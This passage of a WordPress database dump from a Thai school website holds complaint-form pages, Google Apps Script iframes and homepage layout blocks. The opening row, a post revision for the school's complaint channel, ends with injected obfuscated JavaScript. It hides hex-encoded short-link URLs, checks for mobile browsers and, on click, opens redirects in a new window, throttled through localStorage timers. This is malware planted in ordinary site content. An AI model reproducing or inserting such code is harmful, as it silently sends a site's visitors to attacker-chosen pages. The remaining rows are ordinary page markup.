_0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-03 15:12:54','2025-07-03 08:12:54','',484,'http://pakhaeng.ssk.in.th/?p=1675',0,'revision','',0),
(1676,1,'2025-07-04 09:04:48','2025-07-04 02:04:48','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->','ระบบรับข้อร้องเรียน','','publish','closed','closed','','%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2025-07-04 09:37:33','2025-07-04 02:37:33','',0,'http://pakhaeng.ssk.in.th/?page_id=1676',0,'page','',0),
(1677,1,'2025-07-04 09:04:48','2025-07-04 02:04:48','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->','ระบบรับข้อร้องเรียน','','inherit','closed','closed','','1676-revision-v1','','','2025-07-04 09:04:48','2025-07-04 02:04:48','',1676,'http://pakhaeng.ssk.in.th/?p=1677',0,'revision','',0),
(1678,1,'2025-07-04 09:06:05','2025-07-04 02:06:05','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"></iframe>\n<!-- /wp:html -->','ระบบรับข้อร้องเรียน','','inherit','closed','closed','','1676-revision-v1','','','2025-07-04 09:06:05','2025-07-04 02:06:05','',1676,'http://pakhaeng.ssk.in.th/?p=1678',0,'revision','',0),
(1679,1,'2025-07-04 09:17:22','2025-07-04 02:17:22','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->','ระบบรับข้อร้องเรียน','','inherit','closed','closed','','1676-revision-v1','','','2025-07-04 09:17:22','2025-07-04 02:17:22','',1676,'http://pakhaeng.ssk.in.th/?p=1679',0,'revision','',0),
(1680,1,'2025-07-04 09:20:35','2025-07-04 02:20:35','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->','ระบบรับข้อร้องเรียน','','inherit','closed','closed','','1676-autosave-v1','','','2025-07-04 09:20:35','2025-07-04 02:20:35','',1676,'http://pakhaeng.ssk.in.th/?p=1680',0,'revision','',0),
(1681,1,'2025-07-04 09:37:33','2025-07-04 02:37:33','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->','ระบบรับข้อร้องเรียน','','inherit','closed','closed','','1676-revision-v1','','','2025-07-04 09:37:33','2025-07-04 02:37:33','',1676,'http://pakhaeng.ssk.in.th/?p=1681',0,'revision','',0),
(1682,1,'2025-07-04 14:18:54','2025-07-04 07:18:54','','report','','inherit','','closed','','report','','','2025-07-04 14:18:54','2025-07-04 07:18:54','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png',0,'attachment','image/png',0),
(1684,1,'2025-07-04 14:24:48','2025-07-04 07:24:48','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbyKD8bCjilHAUCjbG1B2khIdnFIGdTpP6PqoXWX27b45AvdDU7h0j03YLDkc8S2OV4y/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ระบบรายงานไปราชการ','','publish','closed','closed','','%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%84%e0%b8%9b%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2025-07-04 14:50:03','2025-07-04 07:50:03','',0,'http://pakhaeng.ssk.in.th/?page_id=1684',0,'page','',0),
(1685,1,'2025-07-04 14:24:48','2025-07-04 07:24:48','<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbyKD8bCjilHAUCjbG1B2khIdnFIGdTpP6PqoXWX27b45AvdDU7h0j03YLDkc8S2OV4y/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->','ระบบรายงานไปราชการ','','inherit','closed','closed','','1684-revision-v1','','','2025-07-04 14:24:48','2025-07-04 07:24:48','',1684,'http://pakhaeng.ssk.in.th/?p=1685',0,'revision','',0),
(1686,1,'2025-07-04 14:25:30','2025-07-04 07:25:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img 